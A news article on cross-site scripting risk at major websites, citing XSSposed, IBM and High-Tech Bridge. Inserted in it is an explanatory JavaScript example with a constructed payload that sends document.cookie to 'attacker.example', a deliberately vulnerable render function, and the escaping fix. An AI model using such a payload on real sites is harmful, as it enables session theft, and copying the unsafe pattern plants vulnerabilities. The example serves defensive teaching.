Website cross-site scripting creates identity theft danger


By Rodika Tollefson, ThirdCertainty

While many companies focus their efforts on preventing major breaches, cyber criminals are taking advantage of the lower-hanging fruit, like cross-site scripting (XSS).

Despite a decline in XSS activity over the past couple of years, a large number of sites, including major ones such as Amazon, Google and Facebook, have been found vulnerable.


Amazon.com’s most recent vulnerability was reported on March 21 to the public archive XSSposed and was not patched for two days, putting both website users and administrators at risk of compromise.

Cross-site scripting is a vulnerability in web applications that lets an attacker inject script into a page so that it executes in the victim’s browser, running with the privileges of the trusted site.

This can allow bad actors to do anything from stealing personal information and accessing sensitive data to taking complete control of a machine through a drive-by download attack.
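To make the mechanism concrete, here is an added example that is not part of the article and not code from Amazon, High-Tech Bridge or any other party it names. It shows the reflected-XSS pattern side by side with the fix, using a made-up search page and a constructed cookie-theft payload (the host attacker.example is a placeholder):

```javascript
// Added example, not from the article: reflected XSS and its fix in Node.js.
// The page template, the payload and the attacker host are all constructed.

// Constructed payload of the classic kind: a script that ships the victim's
// cookies to a host the attacker controls (attacker.example is a placeholder).
const COOKIE_THEFT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// VULNERABLE: untrusted input is concatenated straight into HTML. Whatever the
// user, or a link the user was tricked into clicking, put in the query becomes
// live markup that runs in the victim's browser under the site's origin.
function renderSearchUnsafe(query) {
  return `<!doctype html><html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Escape the characters that can break out of HTML text or attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// FIXED: the same page, with output encoding applied at the point where
// untrusted data meets HTML. The payload is displayed as text, not executed.
function renderSearchSafe(query) {
  return `<!doctype html><html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Crude inspection helper for the demo: list the element names in a page, in
// order. A real scanner would parse the DOM; this is enough to show the change.
function tagNames(html) {
  return [...html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

// Defence in depth for the cookie-theft case: a cookie set with HttpOnly is not
// readable from document.cookie even if a script does run; Secure and SameSite
// limit where the browser sends it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Render the same payload both ways and report what ended up in the page.
function demo() {
  const unsafe = renderSearchUnsafe(COOKIE_THEFT_PAYLOAD);
  const safe = renderSearchSafe(COOKIE_THEFT_PAYLOAD);
  return {
    unsafeHasScript: tagNames(unsafe).includes("script"),
    safeHasScript: tagNames(safe).includes("script"),
    safeTags: tagNames(safe),
  };
}

console.log(demo());
```

Output encoding is the fix that matters; the cookie flags only limit the damage if an injection slips through, which is exactly the situation the cookie-stealing vector described later in the piece relies on.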

“Almost every large website is vulnerable to XSS,” says Ilia Kolochenko, CEO of High-Tech Bridge, a cybersecurity company focused on breach prevention through automated and manual penetration testing.

“In 2004, when XSS first started to appear, the main and basically sole vector was stealing cookies, while now it’s more about sophisticated phishing and drive-by download,” Kolochenko says.

Since its inception in June 2014, XSSposed has logged more than 8,900 reported vulnerabilities, and fewer than 1,300 of those were fixed. Its list includes more than 1,500 VIP websites, including sites like noaa.gov, weather.com and espn.go.com that still have unpatched vulnerabilities.

In a research and intelligence report about XSS published last December, IBM said that of the more than 900 dynamic web application scans its team ran, 17 percent found the application vulnerable.

“While this may not sound like a very high percentage, take into account that this data sample comes from organizations that have extremely mature and established security practices,” analyst Nikita Gupta wrote in the report.

For cybercriminals, vulnerable websites are attractive regardless of size, location or type of business, according to High-Tech Bridge.

High-profile ones could fetch as much as $1,000 on the black market, the company said. And while smaller ones may only cost $1, they’re much easier to compromise, making them just as attractive.

WhiteHat Security’s 2014 Website Security Statistics Report found cross-site scripting to be the most common vulnerability class in most of the programming languages it examined.

Kolochenko said he expects the trend to continue because some subtypes of XSS are difficult to detect, and automated scanners cannot find all of them.

He notes that a recent report by market research and consulting company Frost & Sullivan shows an increase in hybrid (automated and manual) testing of web applications.

The report says that while businesses “continue to underestimate the risk associated with unprotected Web applications,” hackers are increasingly relying on automated methods “to target a broad set of victims.”

Kolochenko notes, “The XSS vulnerability discovered on Amazon.com is just another confirmation that automated scanning tools and solutions are not enough to assume continuous website security.”



Posted in Identity Theft, News & Analysis